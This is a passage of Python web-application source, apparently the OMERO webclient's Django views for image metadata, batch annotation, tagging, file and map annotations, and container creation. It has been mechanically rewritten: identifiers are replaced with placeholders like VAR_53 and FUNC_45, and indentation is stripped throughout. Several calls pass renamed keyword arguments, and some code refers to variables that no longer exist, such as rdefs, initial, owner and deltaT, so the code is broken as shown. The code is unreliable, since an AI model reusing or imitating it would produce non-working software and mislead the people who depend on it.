VAR_53["share"] = BaseShare(VAR_6, VAR_25)
else:
VAR_54 = "webclient/annotations/metadata_general.html"
VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
VAR_117 = VAR_104.listFigureScripts()
VAR_53["manager"] = VAR_104
if VAR_23 in ("tag", "tagset"):
VAR_53["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if VAR_116 is not None:
VAR_53["form_comment"] = VAR_116
VAR_53["figScripts"] = VAR_117
VAR_53["template"] = VAR_54
VAR_53["webclient_path"] = VAR_350("webindex")
return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
VAR_53 = {}
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24)})
if VAR_25:
VAR_53["share"] = BaseShare(VAR_6, VAR_25)
if VAR_23 == "well":
VAR_104.image = VAR_104.well.getImage(VAR_93)
VAR_118 = VAR_104.image.getAllRenderingDefs()
VAR_119 = {}
VAR_120 = VAR_104.image.getRenderingDefId()
for VAR_71 in VAR_118:
VAR_229 = VAR_71["owner"]["id"]
VAR_71["current"] = VAR_71["id"] == VAR_120
if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
VAR_119[VAR_229] = VAR_71
VAR_119 = rdefs.values()
VAR_121 = []
for VAR_71 in VAR_119:
VAR_282 = []
for VAR_318, VAR_382 in enumerate(VAR_71["c"]):
VAR_348 = "-"
if VAR_382["active"]:
VAR_348 = ""
VAR_349 = VAR_382["lut"] if "lut" in VAR_382 else VAR_382["color"]
VAR_350 = "r" if VAR_382["inverted"] else "-r"
VAR_282.append(
"%s%s|%s:%s%s$%s" % (VAR_348, VAR_318 + 1, VAR_382["start"], VAR_382["end"], VAR_350, VAR_349)
)
VAR_121.append(
{
"id": VAR_71["id"],
"owner": VAR_71["owner"],
"c": ",".join(VAR_282),
"m": VAR_71["model"] == "greyscale" and "g" or "c",
}
)
VAR_122, VAR_123 = VAR_6.getMaxPlaneSize()
VAR_124 = VAR_104.image.getSizeX()
VAR_125 = VAR_104.image.getSizeY()
VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
VAR_53["manager"] = VAR_104
VAR_53["rdefsJson"] = json.dumps(VAR_121)
VAR_53["rdefs"] = VAR_119
VAR_53["template"] = "webclient/annotations/metadata_preview.html"
return VAR_53
@login_required()
@render_response()
def FUNC_40(VAR_2, VAR_23, VAR_24, VAR_6=None, **VAR_7):
VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24)})
VAR_53 = {"manager": VAR_104}
VAR_53["template"] = "webclient/annotations/metadata_hierarchy.html"
return VAR_53
@login_required()
@render_response()
def FUNC_41(
VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7
):
try:
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_6, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
else:
VAR_54 = "webclient/annotations/metadata_acquisition.html"
VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24)})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_126 = None
VAR_127 = None
VAR_128 = None
VAR_129 = list()
VAR_130 = None
VAR_131 = list()
VAR_132 = list()
VAR_133 = list()
VAR_134 = list()
VAR_135 = list()
VAR_136 = list(VAR_6.getEnumerationEntries("LaserType"))
VAR_137 = list(VAR_6.getEnumerationEntries("ArcType"))
VAR_138 = list(VAR_6.getEnumerationEntries("FilamentType"))
VAR_139 = None
VAR_140 = None
VAR_141 = None
if VAR_23 == "image":
if VAR_25 is None:
VAR_104.companionFiles()
VAR_104.channelMetadata()
for theC, ch in enumerate(VAR_104.channel_metadata):
VAR_351 = ch.getLogicalChannel()
if VAR_351 is not None:
VAR_390 = dict()
VAR_390["form"] = MetadataChannelForm(
VAR_115={
"logicalChannel": VAR_351,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
VAR_6.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
VAR_6.getEnumerationEntries("ContrastMethodI")
),
"modes": list(VAR_6.getEnumerationEntries("AcquisitionModeI")),
}
)
if VAR_25 is None:
VAR_422 = VAR_351.getLightPath()
if VAR_422 is not None:
VAR_390["form_dichroic"] = None
VAR_390["form_excitation_filters"] = list()
VAR_390["form_emission_filters"] = list()
VAR_432 = VAR_422.getDichroic()
if VAR_432 is not None:
VAR_390["form_dichroic"] = MetadataDichroicForm(
VAR_115={"dichroic": VAR_432}
)
VAR_433 = list(VAR_6.getEnumerationEntries("FilterTypeI"))
for f in VAR_422.getEmissionFilters():
VAR_390["form_emission_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_433}
)
)
for f in VAR_422.getExcitationFilters():
VAR_390["form_excitation_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_433}
)
)
VAR_423 = VAR_351.getDetectorSettings()
if (
VAR_423._obj is not None
and VAR_423.getDetector()
):
VAR_390["form_detector_settings"] = MetadataDetectorForm(
VAR_115={
"detectorSettings": VAR_423,
"detector": VAR_423.getDetector(),
"types": list(
VAR_6.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(VAR_6.getEnumerationEntries("Binning")),
}
)
VAR_424 = VAR_351.getLightSourceSettings()
if (
VAR_424 is not None
and VAR_424._obj is not None
):
VAR_434 = VAR_424.getLightSource()
if VAR_434 is not None:
VAR_437 = VAR_136
if VAR_434.OMERO_CLASS == "Arc":
VAR_437 = VAR_137
elif VAR_434.OMERO_CLASS == "Filament":
VAR_437 = VAR_138
VAR_390["form_light_source"] = MetadataLightSourceForm(
VAR_115={
"lightSource": VAR_434,
"lightSourceSettings": VAR_424,
"lstypes": VAR_437,
"mediums": list(
VAR_6.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
VAR_6.getEnumerationEntries("PulseI")
),
}
)
VAR_390["label"] = ch.getLabel()
VAR_349 = ch.getColor()
VAR_390["color"] = VAR_349 is not None and VAR_349.getHtml() or None
VAR_391 = (
VAR_104.image
and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
VAR_392 = []
for pi in VAR_391:
VAR_425 = pi.getDeltaT(units="SECOND")
VAR_426 = pi.getExposureTime(units="SECOND")
if VAR_425 is None and VAR_426 is None:
continue
if VAR_425 is not None:
VAR_425 = deltaT.getValue()
if VAR_426 is not None:
VAR_426 = exposure.getValue()
VAR_392.append(
{"theT": pi.theT, "deltaT": VAR_425, "exposureTime": VAR_426}
)
VAR_390["plane_info"] = VAR_392
VAR_134.append(VAR_390)
try:
VAR_142 = VAR_104.well.getWellSample().image()
except Exception:
VAR_142 = VAR_104.image
if VAR_25 is None: # 9853
if VAR_142.getObjectiveSettings() is not None:
if VAR_139 is None:
VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
VAR_127 = MetadataObjectiveSettingsForm(
VAR_115={
"objectiveSettings": VAR_142.getObjectiveSettings(),
"objective": VAR_142.getObjectiveSettings().getObjective(),
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
}
)
if VAR_142.getImagingEnvironment() is not None:
VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
if VAR_142.getStageLabel() is not None:
VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
VAR_352 = VAR_142.getInstrument()
if VAR_352 is not None:
if VAR_352.getMicroscope() is not None:
VAR_128 = MetadataMicroscopeForm(
VAR_115={
"microscopeTypes": list(
VAR_6.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": VAR_352.getMicroscope(),
}
)
VAR_393 = VAR_352.getObjectives()
for o in VAR_393:
if VAR_139 is None:
VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
VAR_427 = MetadataObjectiveForm(
VAR_115={
"objective": o,
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
}
)
VAR_129.append(VAR_427)
VAR_394 = list(VAR_352.getFilters())
if len(VAR_394) > 0:
for f in VAR_394:
VAR_435 = MetadataFilterForm(
VAR_115={
"filter": f,
"types": list(
VAR_6.getEnumerationEntries("FilterTypeI")
),
}
)
VAR_131.append(VAR_435)
VAR_395 = list(VAR_352.getDichroics())
for VAR_362 in VAR_395:
VAR_428 = MetadataDichroicForm(VAR_115={"dichroic": VAR_362})
VAR_132.append(VAR_428)
VAR_396 = list(VAR_352.getDetectors())
if len(VAR_396) > 0:
for VAR_362 in VAR_396:
VAR_436 = MetadataDetectorForm(
VAR_115={
"detectorSettings": None,
"detector": VAR_362,
"types": list(
VAR_6.getEnumerationEntries("DetectorTypeI")
),
}
)
VAR_133.append(VAR_436)
VAR_397 = list(VAR_352.getLightSources())
if len(VAR_397) > 0:
for laser in VAR_397:
VAR_437 = VAR_136
if laser.OMERO_CLASS == "Arc":
VAR_437 = VAR_137
elif laser.OMERO_CLASS == "Filament":
VAR_437 = VAR_138
VAR_438 = MetadataLightSourceForm(
VAR_115={
"lightSource": laser,
"lstypes": VAR_437,
"mediums": list(
VAR_6.getEnumerationEntries("LaserMediumI")
),
"pulses": list(VAR_6.getEnumerationEntries("PulseI")),
}
)
VAR_135.append(VAR_438)
VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
if VAR_23 not in ("share", "discussion", "tag"):
VAR_53["form_channels"] = VAR_134
VAR_53["form_environment"] = VAR_126
VAR_53["form_objective"] = VAR_127
VAR_53["form_microscope"] = VAR_128
VAR_53["form_instrument_objectives"] = VAR_129
VAR_53["form_filters"] = VAR_131
VAR_53["form_dichroics"] = VAR_132
VAR_53["form_detectors"] = VAR_133
VAR_53["form_lasers"] = VAR_135
VAR_53["form_stageLabel"] = VAR_130
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_42(VAR_2, VAR_26, VAR_6=None, VAR_25=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_53 = {
"template": "webclient/annotations/original_metadata.html",
"imageId": VAR_142.getId(),
}
try:
VAR_181 = VAR_142.loadOriginalMetadata()
if VAR_181 is not None:
VAR_53["original_metadata"] = VAR_181[0]
VAR_53["global_metadata"] = VAR_181[1]
VAR_53["series_metadata"] = VAR_181[2]
except omero.LockTimeout:
return HttpResponse(VAR_286="LockTimeout", VAR_313=408)
return VAR_53
def FUNC_43(VAR_2, VAR_6=None):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_106 = (
len(VAR_71.getlist("image")) > 0
and list(VAR_6.getObjects("Image", VAR_71.getlist("image")))
or list()
)
VAR_107 = (
len(VAR_71.getlist("dataset")) > 0
and list(VAR_6.getObjects("Dataset", VAR_71.getlist("dataset")))
or list()
)
VAR_108 = (
len(VAR_71.getlist("project")) > 0
and list(VAR_6.getObjects("Project", VAR_71.getlist("project")))
or list()
)
VAR_109 = (
len(VAR_71.getlist("screen")) > 0
and list(VAR_6.getObjects("Screen", VAR_71.getlist("screen")))
or list()
)
VAR_110 = (
len(VAR_71.getlist("plate")) > 0
and list(VAR_6.getObjects("Plate", VAR_71.getlist("plate")))
or list()
)
VAR_111 = (
len(VAR_71.getlist("acquisition")) > 0
and list(VAR_6.getObjects("PlateAcquisition", VAR_71.getlist("acquisition")))
or list()
)
VAR_112 = (
len(VAR_71.getlist("share")) > 0 and [VAR_6.getShare(VAR_71.getlist("share")[0])] or list()
)
VAR_113 = (
len(VAR_71.getlist("well")) > 0
and list(VAR_6.getObjects("Well", VAR_71.getlist("well")))
or list()
)
return {
"image": VAR_106,
"dataset": VAR_107,
"project": VAR_108,
"screen": VAR_109,
"plate": VAR_110,
"acquisition": VAR_111,
"well": VAR_113,
"share": VAR_112,
}
def FUNC_44(VAR_2):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_114 = {
"images": VAR_71.getlist("image"),
"datasets": VAR_71.getlist("dataset"),
"projects": VAR_71.getlist("project"),
"screens": VAR_71.getlist("screen"),
"plates": VAR_71.getlist("plate"),
"acquisitions": VAR_71.getlist("acquisition"),
"wells": VAR_71.getlist("well"),
"shares": VAR_71.getlist("share"),
}
return VAR_114
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_6=None, **VAR_7):
VAR_143 = FUNC_43(VAR_2, VAR_6)
VAR_144 = []
VAR_145 = []
VAR_146 = set()
VAR_147 = False
for VAR_310 in VAR_143:
VAR_144 += ["%s=%s" % (VAR_310, o.id) for o in VAR_143[VAR_310]]
for o in VAR_143[VAR_310]:
VAR_146.add(o.getDetails().group.id.val)
if not o.canAnnotate():
VAR_147 = (
"Can't add annotations because you don't" " have permissions"
)
VAR_145.append({"type": VAR_310.title(), "id": o.id, "name": o.getName()})
VAR_148 = "&".join(VAR_144)
VAR_149 = "|".join(VAR_144).replace("=", "-")
if len(VAR_146) == 0:
if (
len(VAR_2.GET.getlist("tag")) > 0
or len(VAR_2.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
else:
return handlerInternalError(VAR_2, "No objects found")
VAR_150 = list(VAR_146)[0]
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_150)
VAR_104 = BaseContainer(VAR_6)
VAR_117 = VAR_104.listFigureScripts(VAR_143)
VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
VAR_152 = None
VAR_153 = []
if "image" in VAR_143 and len(VAR_143["image"]) > 0:
VAR_153 = [VAR_318.getId() for VAR_318 in VAR_143["image"]]
if len(VAR_153) > 0:
VAR_152 = VAR_6.getFilesetFilesInfo(VAR_153)
VAR_283 = VAR_6.getArchivedFilesInfo(VAR_153)
VAR_152["count"] += VAR_283["count"]
VAR_152["size"] += VAR_283["size"]
VAR_53 = {
"iids": VAR_153,
"obj_string": VAR_148,
"link_string": VAR_149,
"obj_labels": VAR_145,
"batch_ann": True,
"figScripts": VAR_117,
"canExportAsJpg": VAR_151,
"filesetInfo": VAR_152,
"annotationBlocked": VAR_147,
"differentGroups": False,
}
if len(VAR_146) > 1:
VAR_53["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
VAR_53["differentGroups"] = True # E.g. don't run VAR_203 etc
VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
VAR_53["template"] = "webclient/annotations/FUNC_45.html"
VAR_53["webclient_path"] = VAR_350("webindex")
VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
FUNC_43(VAR_2, VAR_6)
)
return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_6=None, **VAR_7):
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
if VAR_155 == 0:
raise Http404("Need to specify objects via e.g. ?VAR_142=1")
VAR_104 = None
if VAR_155 == 1:
for VAR_431 in VAR_114:
if len(VAR_114[VAR_431]) > 0:
VAR_28 = VAR_431[:-1] # "images" -> "image"
VAR_29 = VAR_114[VAR_431][0]
break
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if VAR_28 == "tagset":
VAR_28 = "tag"
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_94[VAR_345(VAR_28)] = int(VAR_29)
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_104 is not None:
VAR_284 = VAR_104.getFilesByObject()
else:
VAR_104 = BaseContainer(VAR_6)
for VAR_215, VAR_143 in VAR_154.items():
if len(VAR_143) > 0:
VAR_284 = VAR_104.getFilesByObject(
VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
)
break
VAR_115["files"] = VAR_284
if VAR_2.method == "POST":
VAR_285 = FilesAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_285.is_valid():
VAR_284 = VAR_285.cleaned_data["files"]
VAR_353 = []
if VAR_284 is not None and len(VAR_284) > 0:
VAR_353 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
VAR_234 = (
"annotation_file" in VAR_2.FILES
and VAR_2.FILES["annotation_file"]
or None
)
if VAR_234 is not None and VAR_234 != "":
VAR_398 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
VAR_353.append(VAR_398)
return JsonResponse({"fileIds": VAR_353})
else:
return HttpResponse(VAR_285.errors)
else:
VAR_285 = FilesAnnotationForm(VAR_115=initial)
VAR_53 = {"form_file": VAR_285}
VAR_54 = "webclient/annotations/files_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404("Only POST supported")
VAR_156 = getIntOrDefault(VAR_2, "rating", 0)
VAR_154 = FUNC_43(VAR_2, VAR_6)
for VAR_309, VAR_143 in VAR_154.items():
for o in VAR_143:
o.setRating(VAR_156)
return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404("Unbound instance of VAR_22 not available.")
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
"shares": VAR_154["share"],
}
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_157 = CommentAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_157.is_valid():
VAR_286 = VAR_157.cleaned_data["comment"]
if VAR_286 is not None and VAR_286 != "":
if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
VAR_399 = VAR_154["share"][0].id
VAR_104 = BaseShare(VAR_6, VAR_399)
VAR_400 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_350("load_template", args=["public"])
),
int(VAR_6.server_id),
)
VAR_401 = VAR_104.addComment(VAR_400, VAR_286)
VAR_53 = {
"tann": VAR_401,
"added_by": VAR_6.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
VAR_104 = BaseContainer(VAR_6)
VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
VAR_53 = {"annId": VAR_34, "added_by": VAR_6.getUserId()}
return VAR_53
else:
return HttpResponse(VAR_345(VAR_157.errors))
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404(
"Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
)
VAR_154 = FUNC_43(VAR_2, VAR_6)
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_158 = VAR_2.POST.get("mapAnnotation")
VAR_158 = json.loads(VAR_158)
VAR_159 = VAR_2.POST.getlist("annId")
VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
if len(VAR_159) == 0 and len(VAR_158) > 0:
VAR_287 = VAR_2.POST.get("duplicate", "false")
VAR_287.lower() == "true"
if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
VAR_287 = True
if VAR_287:
for VAR_413, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
VAR_38.linkAnnotation(VAR_180)
else:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
for VAR_413, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_38.linkAnnotation(VAR_180)
else:
for VAR_34 in VAR_159:
VAR_180 = VAR_6.getObject("MapAnnotation", VAR_34)
if VAR_180 is None:
continue
if len(VAR_158) > 0:
VAR_180.setValue(VAR_158)
VAR_180.save()
else:
VAR_84 = VAR_6.deleteObjects("/Annotation", [VAR_34])
try:
VAR_6._waitOnCmd(VAR_84)
finally:
VAR_84.close()
if len(VAR_158) == 0:
VAR_159 = None
return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_6=None, **VAR_7):
VAR_101 = FUNC_0(VAR_2, "group", -1)
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_345(VAR_101))
try:
VAR_177 = int(VAR_2.GET.get("offset"))
VAR_88 = int(VAR_2.GET.get("limit", 1000))
except Exception:
VAR_177 = VAR_88 = None
VAR_160 = VAR_2.GET.get("jsonmode")
if VAR_160 == "tagcount":
VAR_288 = VAR_6.getTagCount()
return dict(VAR_288=tag_count)
VAR_104 = BaseContainer(VAR_6)
VAR_104.loadTagsRecursive(eid=-1, VAR_177=offset, VAR_88=limit)
VAR_161 = VAR_104.tags_recursive
VAR_162 = VAR_104.tags_recursive_owners
if VAR_160 == "tags":
VAR_71 = list((VAR_318, VAR_431, o, s) for VAR_318, VAR_362, VAR_431, o, s in VAR_161)
return VAR_71
elif VAR_160 == "desc":
return dict((VAR_318, VAR_362) for VAR_318, VAR_362, VAR_431, o, s in VAR_161)
elif VAR_160 == "owners":
return VAR_162
return HttpResponse()
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_6=None, **VAR_7):
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
VAR_104 = None
VAR_163 = VAR_6.getEventContext().userId
VAR_164 = []
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_165, VAR_166 = tree.marshal_annotations(
VAR_6,
VAR_44=VAR_114["projects"],
VAR_45=VAR_114["datasets"],
VAR_46=VAR_114["images"],
VAR_47=VAR_114["screens"],
VAR_48=VAR_114["plates"],
VAR_85=VAR_114["acquisitions"],
VAR_86=VAR_114["wells"],
VAR_89="tag",
VAR_88=VAR_1,
)
VAR_167 = {}
for VAR_232 in VAR_166:
VAR_167[VAR_232["id"]] = VAR_232
if VAR_155 > 1:
VAR_289 = {}
for VAR_431 in VAR_165:
VAR_354 = VAR_431["id"]
if VAR_354 not in VAR_289:
VAR_289[VAR_354] = 0
if VAR_431["link"]["owner"]["id"] == VAR_163:
VAR_289[VAR_354] += 1
VAR_165 = [VAR_431 for VAR_431 in VAR_165 if VAR_289[VAR_431["id"]] == VAR_155]
VAR_168 = []
for tag in VAR_165:
VAR_290 = tag["link"]["owner"]["id"]
VAR_103 = VAR_167[VAR_290]
VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
VAR_292 = True
VAR_293 = tag["link"]["date"]
VAR_294 = VAR_290 == VAR_163
VAR_168.append(
(tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
)
VAR_168.sort(VAR_310=lambda x: x[0])
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
if VAR_2.method == "POST":
VAR_295 = TagsAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
VAR_296 = NewTagsAnnotationFormSet(
prefix="newtags", VAR_158=VAR_2.POST.copy()
)
if VAR_295.is_valid() and VAR_296.is_valid():
VAR_355 = [stag[0] for stag in VAR_168 if stag[5]]
VAR_355 = list(set(VAR_355))
VAR_356 = list(VAR_295.cleaned_data["tags"])
VAR_164 = [tag for tag in VAR_356 if tag not in VAR_355]
VAR_357 = [tag for tag in VAR_355 if tag not in VAR_356]
VAR_104 = BaseContainer(VAR_6)
if VAR_164:
VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
VAR_358 = []
for VAR_22 in VAR_296.forms:
VAR_358.append(
VAR_104.createTagAnnotations(
VAR_22.cleaned_data["tag"],
VAR_22.cleaned_data["description"],
VAR_154,
tag_group_id=VAR_22.cleaned_data["tagset"],
)
)
for remove in VAR_357:
VAR_402 = BaseContainer(VAR_6, tag=remove)
VAR_402.remove(
[
"%s-%s" % (VAR_215, VAR_38.id)
for VAR_215, VAR_143 in VAR_154.items()
for VAR_38 in VAR_143
],
tag_owner_id=VAR_163,
)
return JsonResponse({"added": VAR_164, "removed": VAR_357, "new": VAR_358})
else:
return HttpResponse(VAR_345(VAR_295.errors))
else:
VAR_295 = TagsAnnotationForm(VAR_115=initial)
VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
VAR_53 = {
"form_tags": VAR_295,
"newtags_formset": VAR_296,
"selected_tags": VAR_168,
}
VAR_54 = "webclient/annotations/tags_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_52(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
VAR_169 = VAR_142.getSizeC()
VAR_170 = {}
VAR_171 = {}
for VAR_318 in range(VAR_169):
VAR_297 = VAR_2.POST.get("channel%d" % VAR_318, None)
if VAR_297 is not None:
VAR_297 = smart_str(VAR_297)[:255] # Truncate to fit in DB
VAR_170["channel%d" % VAR_318] = VAR_297
VAR_171[VAR_318 + 1] = VAR_297
if VAR_2.POST.get("confirm_apply", None) is not None:
VAR_298 = VAR_2.POST.get("parentId", None)
if VAR_298 is not None:
VAR_255 = VAR_298.split("-")[0].title()
VAR_359 = VAR_241(VAR_298.split("-")[1])
VAR_299 = VAR_6.setChannelNames(VAR_255, [VAR_359], VAR_171, channelCount=VAR_169)
else:
VAR_299 = VAR_6.setChannelNames("Image", [VAR_142.getId()], VAR_171)
VAR_172 = {"channelNames": VAR_170}
if VAR_299:
VAR_172["imageCount"] = VAR_299["imageCount"]
VAR_172["updateCount"] = VAR_299["updateCount"]
return VAR_172
else:
return {"error": "No VAR_411 found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def FUNC_53(
VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_6=None, **VAR_7
):
VAR_54 = None
VAR_104 = None
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_29 = int(VAR_29)
VAR_94[VAR_345(VAR_28)] = VAR_29
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
elif VAR_28 in ("share", "sharecomment", "chat"):
VAR_104 = BaseShare(VAR_6, VAR_29)
else:
VAR_104 = BaseContainer(VAR_6)
VAR_22 = None
if VAR_27 == "addnewcontainer":
if not VAR_2.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, VAR_313=405
)
VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_345(VAR_22.cleaned_data)))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_360 = VAR_22.cleaned_data["description"]
VAR_103 = VAR_22.cleaned_data["owner"]
if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_40 = VAR_104.createDataset(VAR_3, VAR_360, VAR_103=owner)
elif VAR_28 == "tagset" and VAR_29 > 0:
VAR_40 = VAR_104.createTag(VAR_3, VAR_360, VAR_103=owner)
elif VAR_2.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
VAR_439 = VAR_2.POST.get("folder_type")
if VAR_439 == "dataset":
VAR_40 = VAR_104.createDataset(
VAR_3,
VAR_360,
VAR_103=owner,
img_ids=VAR_2.POST.getlist("image", None),
)
else:
VAR_40 = VAR_6.createContainer(
VAR_439, VAR_3, VAR_360, VAR_103=owner
)
else:
return HttpResponseServerError("Object does not exist")
VAR_361 = {"bad": "false", "id": VAR_40}
return JsonResponse(VAR_361)
else:
VAR_362 = dict()
for e in VAR_22.errors.items():
VAR_362.update({e[0]: unicode(e[1])})
VAR_361 = {"bad": "true", "errs": VAR_362}
return JsonResponse(VAR_361)
